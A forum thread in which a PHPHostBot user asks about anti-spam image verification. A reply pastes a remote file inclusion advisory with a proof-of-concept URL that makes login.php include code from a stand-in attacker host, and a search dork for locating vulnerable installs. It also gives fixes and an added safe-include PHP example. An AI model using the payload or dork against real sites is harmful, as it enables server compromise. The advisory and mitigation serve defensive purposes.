
About:PHPHostBot

FeediaCo

Active Member
Is there any way I could have an image verification installed? Do they offer it? Because I get a lot of spammers and they create accounts and then don't use them. I can tell because the email addresses are my.email@gmail.com or something like that and their passwords are numbers. If there is an image verification then can someone provide me with a link?
 
PhpHostBot <= 1.06 (svr_rootscript) Remote File Inclusion Vulnerability
Vulnerability:
~~~~~~~~~~~~~

Input passed to the "svr_rootscript" parameter in order/login.php is not properly verified before being used to include files.
This can be exploited to include arbitrary files from local or external resources.
Successful exploitation requires that "register_globals" is enabled.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[PhpHostBot-path]/order/login.php?svr_rootscript=http://attacker.com/evil?

Google Dork:
~~~~~~~~~~
"order?page=plan_show"

Solution:
~~~~~~

- Edit the source code to ensure that input is properly verified.
- Turn off register_globals.
- Use the latest version.
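
An added example, not part of the original post and not PhpHostBot's own code: one way to carry out the "ensure that input is properly verified" step for a path that ends up in an `include`. `APP_ROOT`, `safe_include_path()`, the commented file name and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example. Names here are hypothetical, not taken from PhpHostBot.
//
// Pattern the advisory describes, shown as a comment only:
//   include $svr_rootscript . 'inc/header.php';   // file name is hypothetical
// With register_globals on, ?svr_rootscript=... fills that variable before the
// script runs, so the request decides which file PHP loads.

// The base path comes from the server, never from the request.
define('APP_ROOT', realpath(__DIR__));

// Resolve an include target and require it to stay under APP_ROOT.
function safe_include_path(string $relative): string
{
    // Reject URL schemes and stream wrappers (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        throw new InvalidArgumentException('scheme not allowed in include path');
    }
    // realpath() returns false for missing files and collapses ../ sequences.
    $resolved = realpath(APP_ROOT . DIRECTORY_SEPARATOR . $relative);
    $prefix   = APP_ROOT . DIRECTORY_SEPARATOR;
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        throw new InvalidArgumentException('include path is outside the application root');
    }
    return $resolved;
}

// Self-check with constructed inputs: a remote URL, a traversal, a real local file.
$samples = ['http://example.invalid/x?', '../../etc/passwd', basename(__FILE__)];
foreach ($samples as $candidate) {
    try {
        echo $candidate, ' -> ', safe_include_path($candidate), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $candidate, ' -> rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The first two sample inputs are rejected and only the file inside the application directory resolves. `register_globals` was removed in PHP 5.4, and `allow_url_include` (off by default since PHP 5.2) should also stay off so that `include` cannot fetch remote URLs.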
 
Could you explain things a little less "PHP"-like, in terms I understand? I do know PHP only a little bit.
 